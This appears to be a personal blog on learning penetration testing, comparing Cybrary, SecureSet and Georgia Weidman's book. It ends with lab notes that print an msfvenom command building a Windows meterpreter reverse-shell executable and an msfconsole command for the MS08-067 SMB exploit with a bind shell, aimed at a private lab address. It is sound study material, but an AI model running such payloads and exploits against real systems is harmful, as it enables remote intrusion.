Initial Thoughts on Cybrary

I am a couple days into Cybrary, and here are my initial reactions:

Pros:

  • No need to set up the Labs.  They are all configured for you and all you have to do is start writing commands
  • Mentors!  I have set up times to start talking to some people who know about the field.  I start my first session with a mentor today
  • On a path for actual certifications.  The Penetration Tester Track prepares me for the:
    • Security+ (most likely not going to do since I have my CISSP)
    • E-Council CEH (I have v.7 of this one already, but I might retake it since my original go at it is a pitiful story)
    • CompTIA CySA+ (definitely thinking about this one, but there is a tangent PenTest+ cert – not sure why Cybrary has me going for the analyst cert in the Pen Testing Curriculum.  Something to ask the mentors)
    • CompTIA CASP (for sure this one.  I think this one is the CompTIA advanced cert.  Also, I need five years of hands-on experience and I am not sure if I qualify there at the moment.  Another question for the mentors)

Cons:

  • No need to set up the Labs. They are all configured for you and all you have to do is start writing commands.  This leads to not learning how to set up your own environment, troubleshooting, etc.
  • It’s aggravating that when I complete a Lab, it doesn’t mark it as complete as it should.  I have asked about this, and they say it’s a small bug/glitch.  I hope it can be fixed.  It’s irritating and makes it hard to track my progress – for myself and Cybrary.
  • Money – it’s a little less than $100/month.  BUT, if it lands me in a Pen Testing position, I am game.  This is something to talk to my mentors again on… how to enter the Pen Testing field without just dropping my current career in policy until I can ramp up Pen Testing.  This is a long way from now it feels like, so yeah.  Oh, and SecureSet, well, they are $20K which is hefty and their career counselor has flaked out on me.

So TL;DR, the Pros outweigh the cons.  But, to continue with my own pursuit of spinning up my own lab, I am going to continue with Georgia Weidman’s book on Penetration Testing.   I think there are things to be learned from both approaches.

Moving on to Cybrary

As I move through Georgia Weidman’s book, Penetration Testing: A Hands-On Introduction to Hacking, it is for one, has moved in a direction that, while good, doesn’t quite do a gradual build that I was hoping, and two, many of the apps and commands just don’t work anymore.  They have either been retired or replaced.

I have been eyeing the Cybrary Pro series for quite some time.  When they were offering 20% off, I thought I would take the plunge.  It’s $79.00/month, and I get a mentor and a structure – the labs should be a bit more up to date as well.  Of course, I am taking the penetration testing courses.

I was eyeing SecureSet for a while, but their price tag was high.  Like $20K high.  I think this is for people fresh out of school – it would be great to have that hand on class interaction, but I just simply can’t afford it.  Plus, I have been trying to get them to get a hold of me to talk about classes/courses, and they haven’t.  So the door seems to be closing on that one.

So, Kids, it’s onto Cybrary.

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.49 LPORT=12345 -f exe > chapter4example.exe

…That’s not working either.  The output I am getting is:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload

No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

I think I am going to keep on going….. and it looks like the multi/handler module isn’t working either.  I’ll come back to this as well.

What?! No Msfcli?

So here I am, a little bit into chapter 4, and apparently, msfcli has been depreciated in Metasploit, and that msfconsole -x does the same thing.  Is this true?  I tried running:

msfconsole -x windows/smb/ms08_067_netapi RHOST=10.0.1.49 PAYLOAD=windows/shell_bind_tcp E

With RHOST as my windows host… the framework starts up and then, I get:

Unknown command: exploit/windows/smb/ms08_067_netapi

..Lovely.  I think since this is just a way to run Metaspolit through the command line interface, I am going to leave this problem and move on from here. Move to come.